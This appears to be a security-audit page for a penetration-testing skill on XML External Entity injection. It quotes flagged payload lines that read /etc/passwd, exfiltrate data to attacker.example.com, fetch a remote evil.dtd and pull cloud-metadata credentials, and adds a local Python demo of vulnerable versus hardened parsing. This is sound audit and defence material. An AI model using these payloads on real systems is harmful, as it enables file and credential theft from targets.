testing-for-xxe-injection-vulnerabilities
Enables security professionals to discover and exploit XML External Entity injection vulnerabilities during penetration tests.
Security score
The testing-for-xxe-injection-vulnerabilities skill was audited on Jun 5, 2026 and we found 33 security issues across 2 threat categories, including 1 critical. Review the findings below before installing.
Categories Tested
Two categories produced findings: Access to /etc/passwd (8 findings) and External URL reference (25 findings). Every finding is a line of the skill's own text that the audit's pattern matching flagged: a file path it tells the tester to read, or a host it tells the tester to make the target contact.
Security Issues
Each row quotes the flagged line; the line numbers refer to the skill file, not to this page.
| Category | Skill line | Flagged content |
|---|---|---|
| Access to /etc/passwd | 90 | # Basic XXE payload to read /etc/passwd |
| Access to /etc/passwd | 95 | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| Access to /etc/passwd | 204 | <!ENTITY % file SYSTEM "file:///etc/passwd"> |
| Access to /etc/passwd | 223 | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| Access to /etc/passwd | 313 | A SOAP web service processes XML input without disabling external entities. Injecting a DTD with a SYSTEM entity in the SOAP body reads `/etc/passwd` and returns it in the SOAP response. |
| Access to /etc/passwd | 336 | 2. Include DTD with external entity: <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| Access to /etc/passwd | 341 | - Local file read: /etc/passwd, /etc/hostname, application config files |
| Access to /etc/passwd | 348 | \| /etc/passwd \| 42 user accounts, service accounts identified \| |
| External URL reference | 65 | "https://target.example.com/api/search" |
| External URL reference | 71 | "https://target.example.com/api/search" |
| External URL reference | 81 | -d '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><test/></soap:Body></soap:Envelope>' \ |
| External URL reference | 82 | "https://target.example.com/ws/service" |
| External URL reference | 98 | "https://target.example.com/api/search" |
| External URL reference | 108 | "https://target.example.com/api/search" |
| External URL reference | 118 | "https://target.example.com/api/search" |
| External URL reference | 128 | "https://target.example.com/api/search" |
| External URL reference | 144 | <!ENTITY xxe SYSTEM "http://abc123.oast.fun/xxe-test"> |
| External URL reference | 147 | "https://target.example.com/api/search" |
| External URL reference | 156 | <!ENTITY xxe SYSTEM "http://xxe-confirmed.abc123.oast.fun"> |
| External URL reference | 159 | "https://target.example.com/api/search" |
| External URL reference | 166 | <!ENTITY % xxe SYSTEM "http://abc123.oast.fun/xxe-param"> |
| External URL reference | 170 | "https://target.example.com/api/search" |
| External URL reference | 182 | <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.example.com/?data=%file;'>"> |
| External URL reference | 195 | <!ENTITY % dtd SYSTEM "http://attacker.example.com:8888/evil.dtd"> |
| External URL reference | 199 | "https://target.example.com/api/search" |
| External URL reference | 225 | <svg xmlns="http://www.w3.org/2000/svg" width="200" height="200"> |
| External URL reference | 234 | "https://target.example.com/api/upload/avatar" |
| External URL reference | 260 | <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> |
| External URL reference | 263 | "https://target.example.com/api/search" |
| External URL reference | 270 | -d "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:$port/\">]><root><search>&xxe;</search></root>" \ |
| External URL reference | 271 | "https://target.example.com/api/search" \| head -c 100 |
| External URL reference | 280 | <!ENTITY xxe SYSTEM "http://internal-admin.local:8080/admin"> |
| External URL reference | 283 | "https://target.example.com/api/search" |
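The findings above quote the payloads but not the parser behaviour they depend on. The following is an added example, not code from the audited skill or from this page's author: it builds the same inline file-read payload shape as the skill's lines 223 and 270 (a DOCTYPE declaring a SYSTEM entity, referenced inside `<search>`), feeds it to Python's stdlib `xml.sax` expat reader with external general entities deliberately enabled (the vulnerable configuration, and the default before Python 3.7.1), then to the same parser with them disabled, and finally through a pre-parse DOCTYPE gate. The target file is a constructed stand-in for `/etc/passwd` written to a temp file, so nothing outside the local machine is touched; `TextCollector`, `parse_untrusted` and `reject_doctype` are names chosen here, not part of any library.

```python
"""Added example (not part of the audited skill): the inline file-read XXE
payload the findings quote, run against a deliberately misconfigured
xml.sax parser and against the same parser with external general entities
disabled. Everything is constructed locally; no target host is contacted."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collect the character data of every element, i.e. the 'search' term
    a vulnerable endpoint would echo back in its response (constructed)."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    @property
    def text(self):
        return "".join(self.chunks)


def xxe_file_read_payload(file_url):
    """Same shape as the skill's finding at its line 270: a DOCTYPE declaring
    a SYSTEM entity, then a reference to it inside the searched element."""
    return (
        '<?xml version="1.0"?>'
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "%s">]>'
        '<root><search>&xxe;</search></root>' % file_url
    ).encode()


def parse_untrusted(xml_bytes, resolve_external_entities):
    """Parse with the stdlib expat-backed SAX reader.

    resolve_external_entities=True models the vulnerable configuration
    (the default before Python 3.7.1); False is the hardened one. The
    expat reader fetches a SYSTEM entity's URL with urllib, so file:// and
    http:// targets (local files, cloud metadata, internal hosts) all work
    once the feature is on.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def reject_doctype(xml_bytes):
    """Defence in depth: an API that never expects a DTD can refuse any
    DOCTYPE before the parser sees it. This also stops the parameter-entity
    and blind out-of-band variants, which a general-entity switch alone
    may not cover on every parser."""
    if b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes:
        raise ValueError("DTD/entity declarations are not accepted")
    return xml_bytes


def demo():
    """Run the payload through both configurations and the gate.
    The file content is a constructed stand-in for /etc/passwd."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n"
                "svc-backup:x:1001:1001::/var/backups:/usr/sbin/nologin\n")
        path = f.name
    try:
        payload = xxe_file_read_payload("file://" + path)
        leaked = parse_untrusted(payload, resolve_external_entities=True)
        hardened = parse_untrusted(payload, resolve_external_entities=False)
        try:
            reject_doctype(payload)
            gated = "accepted"
        except ValueError:
            gated = "rejected"
        return leaked, hardened, gated
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, hardened, gated = demo()
    print("vulnerable parser returned:\n" + leaked)
    print("hardened parser returned: %r" % hardened)
    print("DOCTYPE gate: " + gated)
```

The vulnerable run returns the file's lines as the element text, which is exactly what the skill's SOAP finding (line 313) describes being echoed in the response; the hardened run returns an empty string because the entity reference expands to nothing. In a real application the usual fix is to use a parser configured this way from the start (for Python, `defusedxml` wraps the stdlib parsers with entities and DTD fetching disabled), and to keep the DOCTYPE gate in front of any endpoint that has no legitimate use for DTDs.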